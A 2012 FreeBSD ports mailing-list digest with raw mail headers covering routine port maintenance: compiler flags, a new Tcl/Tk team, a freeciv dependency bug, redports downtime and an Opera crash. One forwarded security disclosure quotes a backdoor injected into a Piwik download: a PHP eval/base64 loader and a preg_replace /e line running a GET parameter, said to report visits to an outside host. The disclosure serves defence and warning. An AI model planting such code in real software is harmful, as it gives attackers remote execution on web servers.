(mail-wi0-f178.google.com [209.85.212.178]) by mx1.freebsd.org (Postfix) with ESMTP id 40D208FC15 for ; Mon, 26 Nov 2012 16:12:05 +0000 (UTC) Received: by mail-wi0-f178.google.com with SMTP id hm6so2952260wib.13 for ; Mon, 26 Nov 2012 08:12:05 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:sender:in-reply-to:references:from:date :x-google-sender-auth:message-id:subject:to:cc:content-type; bh=8CI9H87MCWpi5kIG58Pw09413hnvoWQlFf8cZTmzvRE=; b=W8RZLI+6B8iS+jiGrfjgKln/2PwqWwimzwv1gPH3Q6IW4btWEsO9gpPExXE7Obfi9M 5FDEdj5U/i2VDN5MnNx5OqCIU6c+/O1f0l3fGf5WgocLjCnHCLuBqODMtJvRJpV9iKPu uER3fXEqJwP12nuqtwEQvVY+hPJxmXnWOwvkYa3OwGeMjsjDzCAk/TBflNboJeUGS5lY DLJKtQWe2hKgObfje/gjPV4hpo8Cv42lulX0YOKOBIeMBSGSqcgDeb3brCqKvW/vq6u0 Su2uJFsb37HdNoMlJKF68vPY4ph6eHzM9B5SLtNi7JE9+QOyP/5BkgbJ2JhFUJuwCzTH pWzg== Received: by 10.180.20.109 with SMTP id m13mr21982512wie.16.1353946325209; Mon, 26 Nov 2012 08:12:05 -0800 (PST) MIME-Version: 1.0 Sender: villa.alberto@gmail.com Received: by 10.204.8.155 with HTTP; Mon, 26 Nov 2012 08:07:01 -0800 (PST) In-Reply-To: <20121125114918.GA35966@oshi.local> References: <20121125114918.GA35966@oshi.local> From: Alberto Villa Date: Mon, 26 Nov 2012 17:07:01 +0100 X-Google-Sender-Auth: gRATLPFAY3NsgjbWmUTPPYrULeI Message-ID: Subject: Re: How to handle WITH_CLANG_IS_CC in ports To: Tobias Rehbein Content-Type: text/plain; charset=ISO-8859-1 Cc: Nikolai Lifanov , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 26 Nov 2012 16:12:06 -0000 On Sun, Nov 25, 2012 at 12:49 PM, Tobias Rehbein wrote: > but I guess there is some kind of official way to handle this (ideally > warpped in some Mk macro. For Qt 5 (and, soon, Qt 4 as well) I'm copying the logic of bsd.compiler.mk. -- Alberto Villa, FreeBSD committer http://people.FreeBSD.org/~avilla From owner-freebsd-ports@FreeBSD.ORG Mon Nov 26 16:42:34 2012 Return-Path: Delivered-To: ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id D48E09F1; Mon, 26 Nov 2012 16:42:34 +0000 (UTC) (envelope-from gahr@FreeBSD.org) Received: from cpanel09.rubas.ch (cpanel09.rubas.ch [195.182.222.79]) by mx1.freebsd.org (Postfix) with ESMTP id 5B4C78FC12; Mon, 26 Nov 2012 16:42:31 +0000 (UTC) Received: from 98-41.199-178.cust.bluewin.ch ([178.199.41.98]:60178 helo=gahrfit.gahr.ch) by cpanel09.rubas.ch with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256) (Exim 4.80) (envelope-from ) id 1Td1lN-001syY-5G; Mon, 26 Nov 2012 17:42:29 +0100 Date: Mon, 26 Nov 2012 17:42:26 +0100 From: Pietro Cerutti To: ports@FreeBSD.org Subject: [HEADS UP] Tcl/Tk on FreeBSD Message-ID: <20121126164225.GA53110@gahrfit.gahr.ch> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="SLDf9lqlvOQaIe6s" Content-Disposition: inline X-PGP-Key: 0x9571F78E X-PGP-Fingerprint: 1203 92B5 3919 AF84 9B97 28D6 C0C2 6A98 9571 F78E User-Agent: Mutt/1.5.21 (2010-09-15) X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - cpanel09.rubas.ch X-AntiAbuse: Original Domain - freebsd.org X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12] X-AntiAbuse: Sender Address Domain - FreeBSD.org Cc: ports-developers@FreeBSD.org, TclTk@FreeBSD.org, ports-committers@FreeBSD.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list Reply-To: TclTk@FreeBSD.org List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 26 Nov 2012 16:42:35 -0000 --SLDf9lqlvOQaIe6s Content-Type: text/plain; charset=utf-8 Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hello, it is a honour to me to announce that we finally have an official ML dedicated to the maintainance of Tcl/Tk -related ports on FreeBSD. It's TclTk@FreeBSD.org. It's open, and you're welcome to join [1]. We have set up a Wiki page at http://wiki.freebsd.org/TclTk and an IRC channel on EFNet/#freebsd-tcltk. We're really at the beginning and starting to organize work. It's gonna be fun! Among other things, we're planning to slowly move Tcl/Tk -related ports under the maintenance of TclTk@FreeBSD.org. If this rings a bell for a port that you're currently maintaining, please get in touch with us! We are not going to take anything by force, though. [1] http://lists.freebsd.org/mailman/listinfo/freebsd-tcltk Hope to see you soon on TclTk@ and EFNet/#freebsd-tcltk! Pietro (subscriber #2 of tcltk@) --=20 Pietro Cerutti The FreeBSD Project gahr@FreeBSD.org PGP Public Key: http://gahr.ch/pgp --SLDf9lqlvOQaIe6s Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (FreeBSD) iEYEARECAAYFAlCzm/EACgkQwMJqmJVx944hRACg304TEArYlCUo+yeWfmGo+eBr sBwAoLSs/aZKjdVVj1a1GCpuP7a6PctX =S3oZ -----END PGP SIGNATURE----- --SLDf9lqlvOQaIe6s-- From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 02:47:31 2012 Return-Path: Delivered-To: ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id A384D8EA; Tue, 27 Nov 2012 02:47:31 +0000 (UTC) (envelope-from shurd@broadcom.com) Received: from mms3.broadcom.com (mms3.broadcom.com [216.31.210.19]) by mx1.freebsd.org (Postfix) with ESMTP id 651828FC08; Tue, 27 Nov 2012 02:47:31 +0000 (UTC) Received: from [10.9.208.55] by mms3.broadcom.com with ESMTP (Broadcom SMTP Relay (Email Firewall v6.5)); Mon, 26 Nov 2012 18:42:55 -0800 X-Server-Uuid: B86B6450-0931-4310-942E-F00ED04CA7AF Received: from IRVEXCHMB14.corp.ad.broadcom.com ( [fe80::6184:5cb6:5350:4823]) by IRVEXCHCAS07.corp.ad.broadcom.com ( [::1]) with mapi id 14.01.0355.002; Mon, 26 Nov 2012 18:41:59 -0800 From: "Stephen Hurd" To: "johans@FreeBSD.org" Subject: FreeBSD Port: freeciv-nox11-2.3.2_1 Thread-Topic: FreeBSD Port: freeciv-nox11-2.3.2_1 Thread-Index: Ac3MR+KX9RrHKQGTQeeDb+CQ8/voPw== Date: Tue, 27 Nov 2012 02:41:58 +0000 Message-ID: <156984479488CD49A184F5CAB4AF934606FF025A@IRVEXCHMB14.corp.ad.broadcom.com> Accept-Language: en-CA, en-US Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: x-originating-ip: [10.9.208.64] MIME-Version: 1.0 X-WSS-ID: 7CAAF72539W97329-12-01 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.14 Cc: "ports@FreeBSD.org" X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 02:47:32 -0000 FYI, The games/freeciv-nox11 port/package appears to require x11. Stephen Hurd Senior Staff Engineer - Software Development Broadcom Corporation 949-926-8039 shurd@broadcom.com From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 02:55:23 2012 Return-Path: Delivered-To: ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 92B8EB9C; Tue, 27 Nov 2012 02:55:23 +0000 (UTC) (envelope-from shurd@broadcom.com) Received: from mms1.broadcom.com (mms1.broadcom.com [216.31.210.17]) by mx1.freebsd.org (Postfix) with ESMTP id 61A1D8FC12; Tue, 27 Nov 2012 02:55:23 +0000 (UTC) Received: from [10.9.208.53] by mms1.broadcom.com with ESMTP (Broadcom SMTP Relay (Email Firewall v6.5)); Mon, 26 Nov 2012 18:53:14 -0800 X-Server-Uuid: 06151B78-6688-425E-9DE2-57CB27892261 Received: from IRVEXCHMB14.corp.ad.broadcom.com ( [fe80::6184:5cb6:5350:4823]) by IRVEXCHCAS06.corp.ad.broadcom.com ( [::1]) with mapi id 14.01.0355.002; Mon, 26 Nov 2012 18:55:06 -0800 From: "Stephen Hurd" To: "johans@FreeBSD.org" Subject: FreeBSD Port: freeciv-nox11-2.3.2_1 Thread-Topic: FreeBSD Port: freeciv-nox11-2.3.2_1 Thread-Index: Ac3MSfYrzsltgqpUSnKAElrPpGql8Q== Date: Tue, 27 Nov 2012 02:55:06 +0000 Message-ID: <156984479488CD49A184F5CAB4AF934606FF027C@IRVEXCHMB14.corp.ad.broadcom.com> Accept-Language: en-CA, en-US Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: x-originating-ip: [10.9.208.64] MIME-Version: 1.0 X-WSS-ID: 7CAAF4901QK10114879-01-01 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.14 Cc: "ports@FreeBSD.org" X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 02:55:23 -0000 Re: Previous, seems to be because of this line: INSTALLS_ICONS=3D yes Also, the hicolor-icon-theme run depend should likely be only in X11 as wel= l. Stephen Hurd Senior Staff Engineer - Software Development Broadcom Corporation 949-926-8039 shurd@broadcom.com From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 03:43:51 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 12DB0CD3 for ; Tue, 27 Nov 2012 03:43:51 +0000 (UTC) (envelope-from meta@vmeta.jp) Received: from glory.vmeta.jp (7c293911.i-revonet.jp [124.41.57.17]) by mx1.freebsd.org (Postfix) with ESMTP id CFCF08FC13 for ; Tue, 27 Nov 2012 03:43:50 +0000 (UTC) Received: from ssl.vmeta.jp (localhost [127.0.0.1]) by glory.vmeta.jp (Postfix) with ESMTP id 0F094CCB; Tue, 27 Nov 2012 12:38:40 +0900 (JST) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit Date: Tue, 27 Nov 2012 12:38:39 +0900 From: meta To: Subject: Re: The state of redports In-Reply-To: <50A6DD25.6060105@ShaneWare.Biz> References: <50A6DD25.6060105@ShaneWare.Biz> Message-ID: <078404971eaefd202c78c036e6982656@vmeta.jp> X-Sender: meta@vmeta.jp User-Agent: Roundcube Webmail/0.8.4 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 03:43:51 -0000 I know the work continues on rebuilding infrastructure. Is priority low to reopen redports than other infrastructure? Could anybody tell me when redports will be back? In a few days? weeks? months? or almost a year? -- `whois vmeta.jp | nkf -w` meta From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 06:35:51 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 3BB9BF56 for ; Tue, 27 Nov 2012 06:35:51 +0000 (UTC) (envelope-from decke@bluelife.at) Received: from mail-ee0-f54.google.com (mail-ee0-f54.google.com [74.125.83.54]) by mx1.freebsd.org (Postfix) with ESMTP id B24338FC0C for ; Tue, 27 Nov 2012 06:35:50 +0000 (UTC) Received: by mail-ee0-f54.google.com with SMTP id c13so8320083eek.13 for ; Mon, 26 Nov 2012 22:35:49 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=bluelife.at; s=google; h=from:reply-to:to:subject:x-mailer:references:in-reply-to :content-type:content-id:date:message-id:mime-version :content-transfer-encoding; bh=akf8nghNkOHwcEsUoR+WGvtCJjEWQ0XyyAM480Hlp+4=; b=FIO65jM2JTbkVLRZTSi9tEgx+Pt19HWQhUZO/y+u7fUmxDgziK4xKSimpngFq0RVVv h96BonntfNLb4R5wvI1WcMjgisG93uA5qOnZGeWZaf1j85EnjyGI+aadDjTc0AhG4vAh UTGo7UDaS9qBKbnCuUAxvZM2HcrYf4A5m2NV8= X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=20120113; h=from:reply-to:to:subject:x-mailer:references:in-reply-to :content-type:content-id:date:message-id:mime-version :content-transfer-encoding:x-gm-message-state; bh=akf8nghNkOHwcEsUoR+WGvtCJjEWQ0XyyAM480Hlp+4=; b=HyvvU7+ImFKjLD+BjpSwzryiCb9tuyUOAOjdweaeqnERMLbeEAJMAhPHl5P+Mdb6Jx u30bO2ANA5hKQrPqO9NqkZaR3C0K3zEx/NDwz/dzvPbhHbMD1dzAjU5w6gRD9hKJv1yk Kg3lGL1o98PkSUMaHorxHqWKHiu8L9Zu4AO2+ZbzxmGeoA1fWQeXM1jVBkTs6O2ggjkR I91JgrEfUsmKg6vrvzAkZFrE85IQ33C/PF+Wdp45aKWz1p+lcB08Dmihn1hFcu5nVsjP ezqQRSa0oVmesB5+rSCVOKBxI2T2c/G+LHYXElQHFasRNm0qszUoPFwP78kvv/UtIm77 vJ0Q== Received: by 10.14.194.71 with SMTP id l47mr54152274een.6.1353998149337; Mon, 26 Nov 2012 22:35:49 -0800 (PST) Received: from [10.34.180.120] (089144192084.atnat0001.highway.a1.net. [89.144.192.84]) by mx.google.com with ESMTPS id k2sm38788813eep.15.2012.11.26.22.35.46 (version=SSLv3 cipher=OTHER); Mon, 26 Nov 2012 22:35:47 -0800 (PST) From: Bernhard =?ISO-8859-1?Q?Fr=F6hlich?= To: meta , freebsd-ports@freebsd.org Subject: Re: The state of redports X-Mailer: Modest 3.90.7 References: <50A6DD25.6060105@ShaneWare.Biz> <078404971eaefd202c78c036e6982656@vmeta.jp> In-Reply-To: <078404971eaefd202c78c036e6982656@vmeta.jp> Content-Type: text/plain; charset=utf-8 Content-ID: <1353998148.27699.1.camel@Nokia-N900-42-11> Date: Tue, 27 Nov 2012 07:35:49 +0100 Message-Id: <1353998149.27699.2.camel@Nokia-N900-42-11> Mime-Version: 1.0 Content-Transfer-Encoding: 7bit X-Gm-Message-State: ALoCoQlRQinmEBmFLCEXTv+J2WA1G4TYteDEOpNgOnYKhamlid/9qDGiCq3Br0SaSp/bgh3G9gY5 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list Reply-To: Bernhard =?ISO-8859-1?Q?Fr=F6hlich?= List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 06:35:51 -0000 On Di., 27. Nov. 2012 04:38:39 CET, meta wrote: > I know the work continues on rebuilding infrastructure. > Is priority low to reopen redports than other infrastructure? The bottleneck right now are people that can do the security audit and verify carefully which machines are safe and which we need to setup from scratch. > Could anybody tell me when redports will be back? > In a few days? weeks? months? or almost a year? I honestly don't know and I'm unable to make an educated guess so all I can do is to inform people once I have some news. But we are surely talking about days or weeks because otherwise I'll reactivate my box in the basement ... Sorry that this incident knocked redports down for such a long time. Redports still isn't critical enough to the project that it gets dealt with immediately so the plan is clear. We need to provide services to the src people and something nice for cluster admins, security teams and core to make them feel the pain like we do when redports is offline. -- http://www.bluelife.at/ From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 09:03:58 2012 Return-Path: Delivered-To: ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 822C6645 for ; Tue, 27 Nov 2012 09:03:58 +0000 (UTC) (envelope-from johans@stack.nl) Received: from mx1.stack.nl (relay02.stack.nl [IPv6:2001:610:1108:5010::104]) by mx1.freebsd.org (Postfix) with ESMTP id 1396B8FC0C for ; Tue, 27 Nov 2012 09:03:57 +0000 (UTC) Received: by mx1.stack.nl (Postfix, from userid 65534) id 4F15F359305; Tue, 27 Nov 2012 10:03:56 +0100 (CET) X-Spam-DCC: wuwien: scanner01.stack.nl 1290; Body=1 Fuz1=1 Fuz2=1 X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on scanner01.stack.nl X-Spam-Level: X-Spam-Status: No, score=-2.7 required=5.0 tests=AWL,BAYES_00,NO_RELAYS autolearn=ham version=3.2.5 X-Spam-Relay-Country: _RELAYCOUNTRY_ Received: from mud.stack.nl (mud.stack.nl [IPv6:2001:610:1108:5011::70]) by mx1.stack.nl (Postfix) with ESMTP id AFC88358C63; Tue, 27 Nov 2012 10:03:51 +0100 (CET) Received: by mud.stack.nl (Postfix, from userid 801) id A26669653A; Tue, 27 Nov 2012 10:03:51 +0100 (CET) Date: Tue, 27 Nov 2012 10:03:51 +0100 From: Johan van Selst To: Stephen Hurd Subject: Re: FreeBSD Port: freeciv-nox11-2.3.2_1 Message-ID: <20121127090351.GA8705@mud.stack.nl> References: <156984479488CD49A184F5CAB4AF934606FF027C@IRVEXCHMB14.corp.ad.broadcom.com> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="KsGdsel6WgEHnImy" Content-Disposition: inline In-Reply-To: <156984479488CD49A184F5CAB4AF934606FF027C@IRVEXCHMB14.corp.ad.broadcom.com> User-Agent: Mutt/1.5.21 (2010-09-15) Cc: "ports@FreeBSD.org" X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 09:03:58 -0000 --KsGdsel6WgEHnImy Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Stephen Hurd wrote: > Re: Previous, seems to be because of this line: > INSTALLS_ICONS= yes > Also, the hicolor-icon-theme run depend should likely be only in X11 as well. You are right, well spotted. I'll update the port to correct this. Regards, Johan --KsGdsel6WgEHnImy Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- iF4EAREIAAYFAlC0gfYACgkQAEpMHW8nCPRa9wD+KMDtRMPLhAHcP+jrAOZIK9rz JuXZBi/sRwh6dKIN6nUA/jEayQJRirbeYYQYh2PEQOaQcJK/eSDm6TGEuZTHRUVJ =Yi4R -----END PGP SIGNATURE----- --KsGdsel6WgEHnImy-- From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 11:34:42 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 41F16886; Tue, 27 Nov 2012 11:34:42 +0000 (UTC) (envelope-from lumiwa@gmail.com) Received: from mail-ia0-f182.google.com (mail-ia0-f182.google.com [209.85.210.182]) by mx1.freebsd.org (Postfix) with ESMTP id EAA748FC08; Tue, 27 Nov 2012 11:34:41 +0000 (UTC) Received: by mail-ia0-f182.google.com with SMTP id x2so11203419iad.13 for ; Tue, 27 Nov 2012 03:34:41 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=from:to:subject:date:user-agent:mime-version:content-type :content-transfer-encoding:message-id; bh=Y3GyfTved8HS9IJBEHL3kvfcgY7xmhvOq+i8Gr9Ss8U=; b=Z9EUsD4qg/zxQNNZqNhFL2wIKQlpy3gtvS4avNu7BTVWrR8TJ8zZ5bPTI82GACq6l6 ri9Nt5oU5PdZou7rAzNz9B7Xojk6t6xAV2wGy1QbXieqztwEU2C8XS9lQQowvueXOm+u kWjJncdngrMKIjDsSbZELL5SYSFW5ehGWymCLVpOndEH7TpU2rAlLF3cCrc+G0CR4LQj qFEgljcMoGSkVattRFEYxwH4C0EAwfTicm0fbDBh6WcpetmhpKlLkvq32+B6w14WBkpn U+Q5gaLq2RdH5jyGFBUY7oeJS1FUfvEbGUijG9kRZdxd+JiAL00vXekVtNI+/DlfzgMg 2UYA== Received: by 10.50.140.104 with SMTP id rf8mr15385158igb.40.1354016081181; Tue, 27 Nov 2012 03:34:41 -0800 (PST) Received: from luna.wi.rr.com (cpe-184-58-138-79.wi.res.rr.com. [184.58.138.79]) by mx.google.com with ESMTPS id vq4sm1360206igb.10.2012.11.27.03.34.39 (version=TLSv1/SSLv3 cipher=OTHER); Tue, 27 Nov 2012 03:34:40 -0800 (PST) From: ajtiM To: freebsd-ports@freebsd.org Subject: opera 12.11 Date: Tue, 27 Nov 2012 05:34:30 -0600 User-Agent: KMail/1.13.7 (FreeBSD/9.1-RC3; KDE/4.8.4; i386; ; ) MIME-Version: 1.0 Content-Type: Text/Plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Message-Id: <201211270534.31383.lumiwa@gmail.com> X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 11:34:42 -0000 Hi! Update to Opera 12.11 and Opera-Linuxplugins 12.11 from 12.10 on my FreeBSD 9.1 RC-3 doen't works anymore: opera libpng error: incorrect data check libpng error: incorrect data check libpng error: incorrect data check Segmentation fault (core dumped) Thanks in advance. P.S. I used Clang to build Opera. Mitja -------- http://www.redbubble.com/people/lumiwa From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 12:50:06 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 60EEEC89; Tue, 27 Nov 2012 12:50:06 +0000 (UTC) (envelope-from cvs-src@yandex.ru) Received: from forward2h.mail.yandex.net (forward2h.mail.yandex.net [IPv6:2a02:6b8:0:f05::2]) by mx1.freebsd.org (Postfix) with ESMTP id C5BDD8FC13; Tue, 27 Nov 2012 12:50:05 +0000 (UTC) Received: from smtp3h.mail.yandex.net (smtp3h.mail.yandex.net [84.201.186.20]) by forward2h.mail.yandex.net (Yandex) with ESMTP id 234A9701B81; Tue, 27 Nov 2012 16:50:04 +0400 (MSK) Received: from smtp3h.mail.yandex.net (localhost [127.0.0.1]) by smtp3h.mail.yandex.net (Yandex) with ESMTP id B74C21B40139; Tue, 27 Nov 2012 16:50:03 +0400 (MSK) Received: from unknown (unknown [77.66.155.61]) by smtp3h.mail.yandex.net (nwsmtp/Yandex) with ESMTP id o2RijXn5-o3R0aFUD; Tue, 27 Nov 2012 16:50:03 +0400 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yandex.ru; s=mail; t=1354020603; bh=MRcpJqrzy8p1pj6he4BCv9hGBsRGHY5b0qWPSwjZkHI=; h=Message-ID:Date:From:User-Agent:MIME-Version:To:CC:Subject: References:In-Reply-To:X-Forwarded-Message-Id:Content-Type: Content-Transfer-Encoding; b=jAhqlDtAz+1143KxElaA+uiLWS40NybeM/cF5YXUeZxubZZj+xZoPNsfBs/w9tafw RHnGF5UrirKJDd8nuLgvOlESWdYxWy/htMI4sfM/vS9hg2Q7NsoT7qHfX7AesV0z7H oS+KvU4pfvfLltaV0pEij4/SW20lSZFjAqIsNJwc= Message-ID: <50B4B6E9.9020605@yandex.ru> Date: Tue, 27 Nov 2012 16:49:45 +0400 From: Ruslan Mahmatkhanov User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: "ports-secteam@freebsd.org" Subject: Fwd: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive References: <50B3CE75.9060107@grobecker-wtal.de> In-Reply-To: <50B3CE75.9060107@grobecker-wtal.de> X-Forwarded-Message-Id: <50B3CE75.9060107@grobecker-wtal.de> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Cc: FreeBSD Ports Mailing List , hans@nordhaug.priv.no X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 12:50:06 -0000 => piwik-1.9.2.tar.gz doesn't seem to exist in /usr/ports/distfiles/. => Attempting to fetch http://builds.piwik.org/piwik-1.9.2.tar.gz fetch: http://builds.piwik.org/piwik-1.9.2.tar.gz: size mismatch: expected 5676196, actual 5676058 -------- Original message -------- Subject: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive Date: Mon, 26 Nov 2012 21:17:57 +0100 From: Maximilian Grobecker To: full-disclosure@lists.grok.org.uk Hi, this evening I downloaded a fresh archive of Piwik 1.9.2 and found this code at the bottom of the /piwik/core/Loader.php file: (Just a short snippet) -----------snip------------- Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 79B3E374; Tue, 27 Nov 2012 13:22:09 +0000 (UTC) (envelope-from nordhaug@hiMolde.no) Received: from malle.himolde.no (malle.hiMolde.no [158.38.68.22]) by mx1.freebsd.org (Postfix) with ESMTP id CFE628FC13; Tue, 27 Nov 2012 13:22:08 +0000 (UTC) Received: from harr.himolde.no (harr.hiMolde.no [158.38.68.20]) by malle.himolde.no (8.13.8/8.13.8) with ESMTP id qARD9oQW007064; Tue, 27 Nov 2012 14:09:50 +0100 Received: from harr.himolde.no (harr.himolde.no [127.0.0.1]) by harr.himolde.no (8.13.1/8.13.1) with ESMTP id qARDJ5bY004635; Tue, 27 Nov 2012 14:19:05 +0100 Received: (from nordhaug@localhost) by harr.himolde.no (8.13.1/8.13.1/Submit) id qARDJ5pH004634; Tue, 27 Nov 2012 14:19:05 +0100 Date: Tue, 27 Nov 2012 14:19:05 +0100 From: "Hans Fr. Nordhaug" To: Ruslan Mahmatkhanov Subject: Re: Fwd: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive Message-ID: <20121127131905.GA3839@hiMolde.no> References: <50B3CE75.9060107@grobecker-wtal.de> <50B4B6E9.9020605@yandex.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline In-Reply-To: <50B4B6E9.9020605@yandex.ru> User-Agent: Mutt/1.4.1i Cc: FreeBSD Ports Mailing List , ports-secteam@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 13:22:09 -0000 Hi, I just noticed http://piwik.org/blog/2012/11/security-report-piwik-org-webserver-hacked-for-a-few-hours-on-2012-nov-26th/ before I got this message. I downloaded http://builds.piwik.org/piwik-1.9.2.tar.gz and compared it to my local copy of 1.9.2, and all files are unchanged. It's just the archiving that changed the file size. The Piwik build manager is a little bit sloppy ... Regards, Hans * Ruslan Mahmatkhanov [2012-11-27]: > => piwik-1.9.2.tar.gz doesn't seem to exist in /usr/ports/distfiles/. > => Attempting to fetch http://builds.piwik.org/piwik-1.9.2.tar.gz > fetch: http://builds.piwik.org/piwik-1.9.2.tar.gz: size mismatch: > expected 5676196, actual 5676058 > > > > -------- Original message -------- > Subject: [Full-disclosure] Possible infection of Piwik 1.9.2 download > archive > Date: Mon, 26 Nov 2012 21:17:57 +0100 > From: Maximilian Grobecker > To: full-disclosure@lists.grok.org.uk > > Hi, > > this evening I downloaded a fresh archive of Piwik 1.9.2 and found this > code at the bottom of the /piwik/core/Loader.php file: > > (Just a short snippet) > -----------snip------------- > preg_replace("/(.+)/e", $_GET['g'], 'dwm'); exit; > } > if (file_exists(dirname(__FILE__)."/lic.log")) exit; > eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s > > [.......] > > -----------/snip------------- > > > I decoded some parts of this code and found what it does: > It transmits the requested Host Name (from $_SERVER['HTTP_HOST']) and > the request URI via POST to http://prostoivse.com/x.php and creates a > file named "lic.log" in the same directory. > As long as this file exists it seems that no further POST requests are made. > > At the moment I'm trying to figure out the further sense of this code, > but it seems that there might also be some kind of backdoor (because of > the use of $_GET). > > The file in the downloadable archive is dated at > Nov 26, 2012 / 18:42 UTC. > > From forums I know that some people downloaded the archive earlier this > day and don't have this code inside their files. > > At the moment (at 8:08 PM UTC) the archive is downloadable at the > original Piwik web site with this obfuscated code. > > I contacted the developers and managers of Piwik a few minutes ago about > this. > > > -- > Greetings from Wuppertal, Germany > > Max Grobecker From 